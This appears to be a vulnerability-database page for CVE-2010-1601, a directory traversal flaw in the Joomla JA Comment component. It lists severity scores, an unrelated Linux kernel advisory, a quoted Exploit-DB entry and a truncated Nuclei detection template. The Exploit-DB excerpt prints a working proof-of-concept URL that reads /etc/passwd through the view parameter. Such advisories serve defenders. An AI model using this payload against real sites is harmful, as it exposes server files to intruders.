CVE-2010-1601
published 2010-04-29CVE-2010-1601: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in…
PriorityP340medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
15.97%
96.5th percentile
Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q9x5-37gw-5q88: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a
ghsa_unreviewed·2022-05-17
CVE-2010-1601 [MEDIUM] CWE-22 GHSA-q9x5-37gw-5q88: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a
Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
CISA
Linux Kernel Improper Input Validation Vulnerability
cisa·2023-05-12·CVSS 7.8
CVE-2010-3904 [HIGH] CWE-20 Linux Kernel Improper Input Validation Vulnerability
Vulnerability: Linux Kernel Improper Input Validation Vulnerability
Affected: Linux Kernel
Linux Kernel contains an improper input validation vulnerability in the Reliable Datagram Sockets (RDS) protocol implementation that allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://lkml.iu.edu/hypermail/linux/kernel/1601.3/06474.html; https://nvd.nist.gov/vuln/detail/CVE-2010-3904
Remediation Due Date: 2023-06-02
No detection rules found.
Exploit-DB
Joomla! Component JA Comment - Local File Inclusion
exploitdb·2010-04-14
CVE-2010-1601 Joomla! Component JA Comment - Local File Inclusion
Joomla! Component JA Comment - Local File Inclusion
---
[o] Joomla Component JA Comment Local File Inclusion Vulnerability
Software : com_jacomment
Vendor : http://www.joomlart.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_jacomment&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
[o] April 14 2010 - GMT +07:00 Jakarta, Indonesia
Nuclei
Joomla! Component JA Comment - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1601 [MEDIUM] Joomla! Component JA Comment - Local File Inclusion
Joomla! Component JA Comment - Local File Inclusion
A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
remediation: |
Apply the latest security
http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txthttp://secunia.com/advisories/39472http://www.exploit-db.com/exploits/12236http://www.osvdb.org/63802http://www.securityfocus.com/bid/39516https://exchange.xforce.ibmcloud.com/vulnerabilities/57848http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txthttp://secunia.com/advisories/39472http://www.exploit-db.com/exploits/12236http://www.osvdb.org/63802http://www.securityfocus.com/bid/39516https://exchange.xforce.ibmcloud.com/vulnerabilities/57848
2010-04-29
Published